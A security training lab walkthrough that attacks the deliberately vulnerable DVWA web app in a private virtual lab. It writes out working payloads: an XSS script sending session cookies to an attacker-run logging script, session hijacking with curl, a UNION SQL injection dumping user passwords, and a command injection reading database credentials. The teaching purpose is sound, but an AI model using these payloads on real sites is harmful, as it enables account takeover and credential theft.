ComputerSecurityStudent (CSS)

[Login]

[Join Now]

|SECURITY TOOLS >> Damn Vulnerable Web App >> DVWA v1.0.7 >> Current Page

|Views: 49173

(Damn Vulnerable Web App (DVWA): Lesson 16)

{ Reflexive Cross Site Scripting (XSS), Grab Cookies, Encoding, Remote Curl }

Section 0. Background Information

What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
What is a SQL Injection?
- SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
- This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
- The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
What is Cross Site Scripting?
- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.
- XSS enables attackers to inject client-side script into Web pages viewed by other users.
- A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
- In Addition, the attacker can send input (e.g., username, password, session ID, etc) which can be later captured by an external script.
Pre-Requisite Labs
- Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14
Lab Notes
- In this lab we will do the following:
  1. We will test for a basic Reflected Cross Site Scripting vulnerability.
  2. We will use document.cookie to display the PHPSESSID.
  3. We will implement a remote cookie script to record PHP Session IDs.
  4. We will use the captured PHP Session IDs to remote log into DVWA.
  5. We will encode a previous union SQL injection and remotely issue a curl command against DVWA.
  6. We will encode a previous find command execution and remotely issue a curl command against DVWA.
Legal Disclaimer
- As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
- In accordance with UCC § 2-316, this product is provided with "no warranties, either expressed or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
- In addition, this is a teaching website that does not condone malicious behavior of any kind.
- You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
- © 2014 No content replication of any kind is allowed without express written permission.

Section 1: Configure Fedora14 Virtual Machine Settings

Open Your VMware Player
- Instructions:
  1. On Your Host Computer, Go To
  2. Start --> All Program --> VMWare --> VMWare Player
Edit Fedora14 Virtual Machine Settings
- Instructions:
  1. Highlight fedora14
  2. Click Edit virtual machine settings
Edit Network Adapter

Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click on the OK Button.

Section 2: Login to Fedora14

Start Fedora14 VM Instance
- Instructions:
  1. Start Up VMWare Player
  2. Select Fedora14
  3. Play virtual machine
Login to Fedora14
- Instructions:
  1. Login: student
  2. Password: <whatever you set it to>.

Section 3: Open Console Terminal and Retrieve IP Address

Start a Terminal Console
- Instructions:
  1. Applications --> Terminal
Switch user to root
- Instructions:
  1. su - root
  2. <Whatever you set the root password to>
Get IP Address
- Instructions:
  1. ifconfig -a
- Notes(FYI):
  - As indicated below, my IP address is 192.168.1.118.
  - Please record your IP address.

Section 4: Configure BackTrack Virtual Machine Settings

Open Your VMware Player
- Instructions:
  1. On Your Host Computer, Go To
  2. Start --> All Program --> VMWare --> VMWare Player
Edit BackTrack Virtual Machine Settings
- Instructions:
  1. Highlight BackTrack5R1
  2. Click Edit virtual machine settings
Edit Network Adapter
- Instructions:
  1. Highlight Network Adapter
  2. Select Bridged
  3. Click on the OK Button.

Section 5: Login to BackTrack

Start BackTrack VM Instance
- Instructions:
  1. Start Up VMWare Player
  2. Select BackTrack5R1
  3. Play virtual machine
Login to BackTrack
- Instructions:
  1. Login: root
  2. Password: toor or <whatever you changed it to>.
Bring up the GNOME
- Instructions:
  1. Type startx

Section 6: Open Console Terminal and Retrieve IP Address

Open a console terminal
- Instructions:
  1. Click on the console terminal
Get IP Address
- Instructions:
  1. ifconfig -a
- Notes(FYI):
  - As indicated below, my IP address is 192.168.1.119.
  - Please record your IP address.

Section 7: Login to DVWA

Start Firefox
- Instructions:
  1. Click on Firefox
Login to DVWA
- Instructions:
  1. Place http://192.168.1.118/dvwa/login.php in the address bar.
    - Replace 192.168.1.118 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
  2. Login: admin
  3. Password: password
  4. Click on Login

Section 8: Set Security Level

Set DVWA Security Level
- Instructions:
  1. Click on DVWA Security, in the left hand menu.
  2. Select "low"
  3. Click Submit

Section 9: Basic Reflexive Attack

Basic Design Test
- Instructions:
  1. Click on XSS reflected
  2. Input Your Name into the textbox
  3. Click the Submit Button
  4. Notice that the name that you provided in the textbox is display back to the screen.
- Note(FYI):
  1. At first glance, the application is working as designed to simply display back what is inputted in the textbox.
Test webpage for Basic Cross Site Script (XSS) Injection
- Instructions:
  1. Click on XSS reflected
  2. In the "What's your name?" place the following string
    - <script>alert("Hello")</script>
  3. Click the Submit Button
View Cross Site Scripting (XSS) Results
- Note(FYI):
  - Note a message box pops up, because application displays verbatim was is inputted into the text box. Consequently, this is bad because you can use JavaScript to harvest information.
- Instructions:
  1. Click the Okay Button

Section 10: Reflexive Cookie Attack

Inspect Element (Textbox)
- Instructions:
  1. Click on XSS reflected
  2. Right Click in the textbox
  3. Click on Inspect Element
Add New Attribute
- Instructions:
  1. Right Click on the gray highlighted line
  2. Select New Attribute...
Increase the Textbox Size
- Instructions:
  1. Type the following: size=100
  2. Click on the close button
Test Cross Site Script (XSS) Cookie Injection
- Instructions:
  1. In the "What's your name?" Textbox place the following string
    - <script>alert(document.cookie)</script>
  2. Click the Submit Button
- Note(FYI):
  1. The goal here is to determine (1) if this webpage contains a cookie AND (2) if we can display the cookie in a JavaScript alert box.
View Cookie
- Instructions:
  1. Notice the cookie displays a security setting and PHP Session ID.
  2. Click the OK Button
- Notes(FYI):
  1. Imagine if this was a bank website and every time a user logs in their cookie information was sent to a remote location.

Section 11: Prepare BackTrack CGI Cookie Script

On BackTrack, Start up a terminal window
- Instructions:
  1. Click on the Terminal Window
Start Apache2
- Instructions:
  1. service apache2 start
  2. service apache2 status
  3. ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
  1. Start up the apache2 webserver.
  2. Display the status of the apache2 webserver.
  3. See the processes of the apache2 webserver.
Make Apache Log Directory
- Instructions:
  1. mkdir -p /var/www/logdir
  2. chown www-data:www-data /var/www/logdir
  3. chmod 700 /var/www/logdir
  4. ls -ld /var/www/logdir
- Note(FYI):
  1. Make a directory called logdir inside of /var/www
  2. Set the ownership of logdir to www-data
  3. Set the permission of logdir to where only the apache2 process (owned by www-data) can read, write and execute to this directory.
Configure CGI Cookie Script
- Instructions:
  1. cd /usr/lib/cgi-bin/
  2. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson16/logit.pl.TXT
  3. mv logit.pl.TXT logit.pl
  4. chown www-data:www-data logit.pl
  5. chmod 700 logit.pl
  6. perl -c logit.pl
- Note(FYI):
  1. Change directory to /usr/lib/cgi-bin
  2. Use wget to download the CGI Cookie Script
  3. Rename Script
  4. Set ownership of script to www-data, which is the same owner of the apache2 webserver processes.
  5. Set permission to where only the www-data user can read, write and execute the script.
  6. Check the syntax of the CGI Cookie Script (logit.pl)

Section 12: Send Cookie to Remote Server

Inspect Element (Textbox)
- Instructions:
  1. Click on XSS reflected
  2. Right Click in the textbox
  3. Click on Inspect Element
Add New Attribute
- Instructions:
  1. Right Click on the gray highlighted line
  2. Select New Attribute...
Increase the Textbox Size
- Instructions:
  1. Type the following: size=100
  2. Click on the close button
Test Cross Site Script (XSS) Injection
- Note(FYI):
  1. Replace 192.168.1.119 with your BackTrack IP Address obtained in (Section 6, Step 2).
  2. This JavaScript tells the web browser to send the cookie information back to the CGI Cookie Script on the BackTrack Machine.
- Instructions:
  1. In the "What's your name?" Textbox place the following string
    - <SCRIPT>document.location='http://192.168.1.119/cgi-bin/logit.pl?'+document.cookie</SCRIPT>
  2. Click the Submit Button
View Cookie Script Results
- Instructions:
  1. Notice the cookie contains the security setting
  2. Notice the cookie contains the PHP Session ID.
- Notes(FYI):
  1. Note a malicious person would not actually want display the results back to you once you click a button.
  2. Continue to the next step to see where a malicious person might store this data.
View Cookie Script Log File
- Note(FYI):
  1. Replace 192.168.1.119 with your BackTrack IP Address obtained in (Section 6, Step 2).
  2. Now we have a running log file of IP Addresses, Cookie Security Settings, and Session IDs of potential victims.
  3. Pretty scary stuff. This is why it is necessary for web developers to (1) use encoding and (2) test their site for XSS injection attempts.
- Instructions:
  1. Place the following URL in the Address Textbox
    - http://192.168.1.119/logdir/log.txt
  2. Click the Back Arrow Two Times.
View the Current User that is logged in
- Note(FYI):
  - In the lower left corner of the screen you will see that "admin" is the current user that is logged in.
  - In the proceeding steps we will demonstrate how a remote user that captured cookie information could login to DVWA via the command line.
- Instructions:
  1. Click on Home
  2. Notice the "admin" user is logged in with a low security setting.
Remotely Log In Via Command Line
- Instructions:
  1. cd /var/www/logdir/
  2. ls -l log.txt
  3. cat log.txt
  4. curl -b "security=low;PHPSESSID=6kavca1tmq8b32djqplhovj584" --location "http://192.168.1.118/dvwa/" > login.html
  5. egrep '(Username:|Security Level:)' login.html
- Note(FYI):
  1. Replace 6kavca1tmq8b32djqplhovj584 with your PHPSESSID Value (See Picture).
  2. This is the HTML representation of the user login information you would see in the lower left corner. Notice the Username is admin and the Security Level is set to low.

Section 13: How to Encode a SQL Injection

Inspect Element (Textbox)
- Instructions:
  1. Click on the Damn Vulnerable Web App Tab
  2. Click the SQL navigation link.
  3. Right Click on the Textbox
  4. Click Inspect Element
Add New Attribute
- Instructions:
  1. Right Click on the gray highlighted line
  2. Select New Attribute...
Increase the Textbox Size
- Instructions:
  1. Type the following: size=100
  2. Click on the close button
Start Tamper Data
- Instructions:
  1. Click Tools
  2. Click Tamper Data
Minimize Tamper Data
- Instructions:
  1. Click the Minimize Down Arrow
Display DVWA Usernames and Passwords
- Instructions:
  1. Place the following in the text box:
    - ' union select null, concat(first_name,0x3a,last_name,0x3a,user,0x3a,password) from users --
    - Remember to put a space before and after the two hyphens --
  2. Click the Submit Button
  3. Click the Tamper Data Window in the bottom tray
- Note(FYI):
  - concat,concatenates the tables columns first_name, last_name, user and password.
  - 0x3a,is the the hexidecimal representation for a colon(:).
  - from users,refers to the users tables in the dvwa database.
Copy Encoding Union URL
- Instructions:
  1. Click on the second GET
  2. Right Click on the Referer Link
  3. Click Copy All
Open gedit
- Instructions:
  1. cd /var/www/logdir/
  2. gedit union_exploit.txt 2>/dev/null &
Paste and Save
- Instructions:
  1. Right click on the white portion of the screen
  2. Click Paste
  3. Click the Save Button
Execute Curl Encoded Union SQL Injection
- Note(FYI):
  - Resize and place your GEDIT screen in the upper half of your BackTrack Window.
  - Resize and place your TERMINAL screen in the bottom half of your BackTrack Window.
- Instructions:
  1. Place the following curl command into your BackTrack Terminal. Use the below notes section to copy an paste the correct PHPSESSID and DVWA IP Address.
    - curl -b "security=low;PHPSESSID=6kavca1tmq8b32djqplhovj584" --location "http://192.168.1.118/dvwa/vulnerabilities/sqli/?id=%27+union+select+null%2C+concat%28first_name%2C0x3a%2Clast_name%2C0x3a%2Cuser%2C0x3a%2Cpassword%29+from+users+--+&Submit=Submit" | grep -i password | sed 's/<br>/\n/g' | tee dvwa_passwords.txt
- Note(FYI):
  1. You will not need to replace the security setting low, unless you set it to medium or high.
  2. Replace 6kavca1tmq8b32djqplhovj584 with your PHPSESSID
  3. Replace 192.168.1.118 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
View File Contents
- Note(FYI):
  - The file will contain First Name, Last Name, Username and Password.
  - Image a script that remotely injects a malicious union statement at user tables to pull authentication information. This is why backend website developers should decode encoded input before querying the application database.
- Instructions:
  1. ls -l dvwa_passwords.txt
  2. cat dvwa_passwords.txt

Section 14: How to encode a Command Injection

Inspect Element (Textbox)
- Instructions:
  1. Click the Command link.
  2. Right Click on the Textbox
  3. Click Inspect Element
Change Textbox Length
- Instructions:
  1. Click on 30 and type 85
  2. Click on the Close Button
Start Tamper Data
- Instructions:
  1. Click Tools
  2. Click Tamper Data
Clear and Minimize Tamper Data
- Instructions:
  1. Click Clear if present
  2. Click the Minimize Down Arrow
Retrieve DVWA Database Username and Password From Config File
- Instructions:
  1. Place the following command in the textbox
    - 127.0.0.1; find /var/www/html/dvwa/* -name "*config*" -print | xargs egrep -i '(database|user|password)'
  2. Click on the Submit Button
  3. Click on the Tamper Data Window in the lower tray
- Note(FYI):
  1. Typically, poorly configured website applications will actually put the database credentials in a configuration page similar to the one below.
  2. A countermeasure could be to (1) never provide a command execution option and (2) to use encrypted files to store the database credentials in a non-web-accessible directory.
Copy Post Data
- Instructions:
  1. Click on the first POST you see
  2. Right Click on POSTDATA
  3. Click on Copy All
Open gedit
- Instructions:
  1. cd /var/www/logdir/
  2. gedit find_execution.txt 2>/dev/null &
Paste and Save
- Instructions:
  1. Right click on the white portion of the screen
  2. Click Paste
  3. Click the Save Button
Execute Curl Encoded Command Execution Injection
- Note(FYI):
  - Resize and place your GEDIT screen in the upper half of your BackTrack Window.
  - Resize and place your TERMINAL screen in the bottom half of your BackTrack Window.
- Instructions:
  1. Place the following curl command into your BackTrack Terminal. Use the below notes section to copy an paste the correct PHPSESSID and DVWA IP Address.
    - curl -b "security=low;PHPSESSID=6kavca1tmq8b32djqplhovj584" --data "ip=127.0.0.1%3B+find+%2Fvar%2Fwww%2Fhtml%2Fdvwa%2F*+-name+%22*config*%22+-print+%7C+xargs+egrep+-i+%27%28database%7Cuser%7Cpassword%29%27&submit=submit" --location "http://192.168.1.118/dvwa/vulnerabilities/exec/" | tee find.txt
  2. Press <Enter>
- Note(FYI):
  1. Replace 6kavca1tmq8b32djqplhovj584 with your PHPSESSID
  2. Replace 192.168.1.118 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).

Section 15: Proof of Lab

Proof of Lab (On BackTrack)
- Instructions:
  1. egrep '(database|user|password)' find.txt
  2. date
  3. echo "Your Name"
- Proof of Lab Instructions:
  1. Do a <PrtScn>
  2. Paste into a word document
  3. Upload to Moodle